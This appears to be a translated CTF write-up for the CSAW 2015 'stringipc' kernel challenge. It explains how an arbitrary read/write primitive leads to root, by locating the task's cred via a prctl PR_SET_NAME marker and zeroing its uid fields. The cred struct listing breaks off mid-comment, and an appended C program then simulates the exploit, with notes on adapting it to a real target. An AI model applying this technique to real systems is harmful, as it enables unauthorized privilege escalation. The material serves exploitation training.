[Linux Kernel Exploitation] StringIPC: Three Methods from Arbitrary Read/Write to Privilege Escalation (Part 1)

This article discusses how to exploit an arbitrary memory read/write vulnerability in the Linux kernel to modify the cred structure and escalate privileges. It first covers where cred sits relative to thread_info and task_struct, then explains the idea of using prctl's PR_SET_NAME to locate cred and how the memory range to brute-force is determined. Finally it gives the exploitation method and the EXP code.



Challenge: stringipc from CSAW CTF 2015

Environment download: https://github.com/bsauce/CTF/tree/master/stringipc

Goal: learn three exploitation methods that go from arbitrary memory read/write to privilege escalation.

Environment setup:

Kernel version: linux-4.4.184 (gcc-4.7 does not work; use gcc-5). busybox version: 1.31.0. stringipc source[1]; building the source and busybox[2]

Challenge analysis: already covered in the previous article, see the sold_core analysis[3]


1. Elevating privileges by modifying the cred structure

(1) The cred structure

Every thread in the kernel has its own kernel stack and a thread_info structure that the scheduler works with; the structure also carries a range of information about the thread.

thread_info lives at the lowest address of the thread's kernel stack (this holds for the 4.4 kernel used here; from 4.9 on, x86 embeds thread_info in task_struct). Its definition (arch/x86/include/asm/thread_info.h, line 55):

struct thread_info {
    struct task_struct  *task;      /* main task structure */
    __u32               flags;      /* low level flags */
    __u32               status;     /* thread synchronous flags */
    __u32               cpu;        /* current CPU */
    mm_segment_t        addr_limit;
    unsigned int        sig_on_uaccess_error:1;
    unsigned int        uaccess_err:1;  /* uaccess failed */
};

The most important member of thread_info is the pointer to task_struct, which is defined in include/linux/sched.h (line 1390).

// trimmed
struct task_struct {
    volatile long state;    /* -1 unrunnable, 0 runnable, >0 stopped */
    void *stack;
    atomic_t usage;
    unsigned int flags; /* per process flags, defined below */
    unsigned int ptrace;
    ... ...
/* process credentials */
    const struct cred __rcu *ptracer_cred; /* Tracer's credentials at attach */
    const struct cred __rcu *real_cred; /* objective and real subjective task
                                         * credentials (COW) */
    const struct cred __rcu *cred;  /* effective (overridable) subjective task
                                     * credentials (COW) */
    char comm[TASK_COMM_LEN]; /* executable name excluding path
                                 - access with [gs]et_task_comm (which lock
                                   it with task_lock())
                                 - initialized normally by setup_new_exec */
/* file system info */
    struct nameidata *nameidata;
#ifdef CONFIG_SYSVIPC
/* ipc stuff */
    struct sysv_sem sysvsem;
    struct sysv_shm sysvshm;
#endif
    ... ...
};

Of these, the cred structure (include/linux/cred.h, line 118) represents the thread's credentials. Overwriting the fields uid through fsgid with 0 gives the thread root (root's uid is 0). With CONFIG_DEBUG_CREDENTIALS disabled these are eight 4-byte ids that immediately follow the 4-byte usage counter, i.e. bytes 4 through 35 of the struct: zeroing uid through fsuid (28 bytes) already yields a root uid and euid, and including fsgid makes it 32 bytes. The usage refcount at offset 0 must be left untouched.

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private
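As an added example (not code from the original post or from the stringipc exploit), the C program below walks through the method the abstract outlines for this section: tag the current task with a recognisable comm via prctl(PR_SET_NAME), scan memory for that 16-byte string, take the cred pointer 8 bytes before it (cred directly precedes comm in the 4.4 task_struct shown above), validate the candidate, and zero uid through fsgid. Because the StringIPC primitive itself is not on this page, the arbitrary read/write is simulated over a constructed buffer standing in for kernel memory; KMEM_BASE, the offsets inside it, the marker string and the uid 1000 are assumptions of the simulation. A decoy copy of the marker, placed where no task_struct is, shows why a raw string match must be validated before anything is written.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

#define TASK_COMM_LEN 16

/* Head of struct cred with CONFIG_DEBUG_CREDENTIALS off: usage, eight 4-byte ids, securebits. */
struct cred_head {
    uint32_t usage;
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid, securebits;
};

/* Credential slice of the 4.4 task_struct: cred is the pointer right before comm, at &comm - 8. */
struct task_slice {
    uint64_t ptracer_cred, real_cred, cred;
    char     comm[TASK_COMM_LEN];
};

#define KMEM_BASE 0xffff880000000000ULL   /* assumed direct-map address; only the shape matters */
#define KMEM_SIZE 0x3000
static uint8_t kmem[KMEM_SIZE];           /* constructed stand-in for kernel memory */
int g_false_positives;                         /* comm hits rejected by validation */
struct cred_head g_cred_before, g_cred_after;  /* cred contents before/after the overwrite */

/* Arbitrary read (write == 0) or write (write == 1); the real exploit puts the StringIPC primitive here. */
static int arb_rw(uint64_t addr, void *buf, size_t len, int write)
{
    if (addr < KMEM_BASE || addr + len > KMEM_BASE + KMEM_SIZE) return -1;
    if (write) memcpy(kmem + (addr - KMEM_BASE), buf, len);
    else       memcpy(buf, kmem + (addr - KMEM_BASE), len);
    return 0;
}

/* Tag the current task: PR_SET_NAME stores at most 15 bytes plus NUL in task_struct->comm. */
static void set_comm_marker(const char *marker, char out[TASK_COMM_LEN])
{
    snprintf(out, TASK_COMM_LEN, "%s", marker);    /* same truncation the kernel applies */
#ifdef __linux__
    if (prctl(PR_SET_NAME, marker, 0, 0, 0) == 0)
        prctl(PR_GET_NAME, out, 0, 0, 0);           /* read back exactly what the kernel kept */
#endif
}

/* Scan for the 16-byte comm. A hit counts only if the word before it is a kernel pointer (top 16
 * bits set) to a cred carrying our uid; anything else is a stray copy of the string, not our task. */
static uint64_t find_cred_via_comm(uint64_t start, size_t size,
                                   const char comm16[TASK_COMM_LEN], uint32_t my_uid)
{
    char buf[TASK_COMM_LEN]; uint64_t cred_ptr; struct cred_head c;
    for (uint64_t a = start; a + TASK_COMM_LEN <= start + size; a += 8) {
        if (arb_rw(a, buf, TASK_COMM_LEN, 0) < 0 || memcmp(buf, comm16, TASK_COMM_LEN) != 0)
            continue;
        if (arb_rw(a - 8, &cred_ptr, 8, 0) < 0 || (cred_ptr >> 48) != 0xffff ||
            arb_rw(cred_ptr, &c, sizeof c, 0) < 0 || c.uid != my_uid || c.euid != my_uid) {
            g_false_positives++;
            continue;
        }
        return cred_ptr;
    }
    return 0;
}

/* Zero uid..fsgid: 32 bytes at offset 4. The usage refcount at offset 0 is left intact. */
static int escalate_cred(uint64_t cred)
{
    uint32_t zeros[8] = { 0 };
    return arb_rw(cred + offsetof(struct cred_head, uid), zeros, sizeof zeros, 1);
}

/* Fake region: a decoy marker with nothing in front of it, our cred (uid 1000), and our task slice. */
static void build_simulated_kmem(const char comm16[TASK_COMM_LEN])
{
    struct cred_head cred = { .usage = 2, .uid = 1000, .gid = 1000, .suid = 1000, .sgid = 1000,
                              .euid = 1000, .egid = 1000, .fsuid = 1000, .fsgid = 1000 };
    struct task_slice ts = { .real_cred = KMEM_BASE + 0x2000, .cred = KMEM_BASE + 0x2000 };
    memset(kmem, 0, sizeof kmem);
    memcpy(kmem + 0x100, comm16, TASK_COMM_LEN);   /* decoy: must be rejected */
    memcpy(kmem + 0x2000, &cred, sizeof cred);
    memcpy(ts.comm, comm16, TASK_COMM_LEN);
    memcpy(kmem + 0x1000, &ts, sizeof ts);         /* comm lands at 0x1018 */
}

/* Tag, build, locate, escalate. Returns 0 on success; results are left in the globals. */
int run_exploit_sim(void)
{
    char comm16[TASK_COMM_LEN]; uint64_t cred;
    g_false_positives = 0;
    set_comm_marker("kexp_marker_001", comm16);          /* 15 chars, fits comm */
    build_simulated_kmem(comm16);
    cred = find_cred_via_comm(KMEM_BASE, KMEM_SIZE, comm16, 1000);  /* on a real target: getuid() */
    if (cred == 0 || arb_rw(cred, &g_cred_before, sizeof g_cred_before, 0) < 0 ||
        escalate_cred(cred) < 0 || arb_rw(cred, &g_cred_after, sizeof g_cred_after, 0) < 0)
        return -1;
    return 0;
}
```

run_exploit_sim() is the entry point: after it returns 0, g_cred_after holds all-zero ids with the usage count untouched, and g_false_positives is 1 because the decoy string at 0x100 had no kernel pointer in front of it. On a real target you replace arb_rw with the challenge's read/write, pass getuid() as the expected uid, and scan the kernel's direct-mapped region instead of the fake buffer; the two validation checks (pointer looks like a kernel address, pointed-to cred carries your uid) are what keep a stray copy of the marker from turning into a write to the wrong place.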